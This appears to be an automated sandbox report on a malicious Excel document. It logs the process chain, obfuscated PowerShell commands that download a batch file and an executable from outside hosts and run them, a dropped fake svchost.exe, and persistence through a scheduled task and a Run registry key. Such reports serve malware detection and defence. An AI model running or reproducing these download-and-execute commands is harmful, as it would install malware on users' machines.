Source: C:\Users\user\AppData\Roaming\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown	Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 18,1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2120349465.0000000002B70000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2139019469.0000000002B80000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2116599990.0000000002AD0000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: ps.exe.23.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: GvthaHtVzpRh.exe.24.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.ps.exe.e70000.2.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: svchost.exe.27.dr, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.2.ps.exe.e70000.1.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.0.ps.exe.e70000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 32.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 32.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 35.2.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 35.0.svchost.exe.230000.0.unpack, EnumeratorDropIndices.cs	.Net Code: DiscardableAttribute System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Obfuscated command line found

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'	Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

27_2_004F1750

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FF002606FD pushad ; ret	7_2_000007FF00260741
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00E7B93E push es; ret	24_2_00E7B9B3
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_0029887D push esp; retf	24_2_0029887E
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00296AB5 push esp; retf	24_2_00296AB6
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_002994C1 push esp; retf	24_2_002994C2
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00297F27 push esp; ret	24_2_00297F51
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00297F58 pushad ; ret	24_2_00297F75
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A721B push ecx; retf	24_2_004A721C
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AF11AA push cs; retf	24_2_00AF1FE4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00480FEB push eax; mov dword ptr [esp], 00401500h	27_2_00481022
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00480FEB push edx; mov dword ptr [esp], 0040150Eh	27_2_00481045
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041E390 push eax; mov dword ptr [esp], esi	27_2_0041E433
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041E560 push edx; mov dword ptr [esp], ebp	27_2_0041E748
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004019C9 push edx; mov dword ptr [esp], eax	27_2_00401BED
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004019C9 push ecx; mov dword ptr [esp], eax	27_2_00401BF9
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401D0B push eax; mov dword ptr [esp], esi	27_2_00401DE4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push edx; mov dword ptr [esp], 00000064h	27_2_004020C2
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push ecx; mov dword ptr [esp], edi	27_2_004020D0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi	27_2_004020E4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push edi; mov dword ptr [esp], 00000064h	27_2_004021AD
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00401ED2 push eax; mov dword ptr [esp], esi	27_2_004021B7
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00E7B93E push es; ret	27_2_00E7B9B3
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_0023B93E push es; ret	32_2_0023B9B3
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_0020887D push esp; retf	32_2_0020887E
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00208158 push esp; ret	32_2_00208159
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00207A76 push esp; ret	32_2_00207F51
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00206AB5 push esp; retf	32_2_00206AB6
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_002094C1 push esp; retf	32_2_002094C2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_00207EC4 push esp; ret	32_2_00207F51
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C721B push ecx; retf	32_2_003C721C
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 35_2_0023B93E push es; ret	35_2_0023B9B3

Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792
Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792
Source: initial sample	Static PE information: section name: .text entropy: 7.92184485792

Persistence and Installation Behavior:

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\ps.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Tries to download and execute files (via powershell)

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;			Jump to behavior

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\ps.exe	File created: C:\Users\user\AppData\Roaming\svchost.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ps.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ps.exe	File created: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
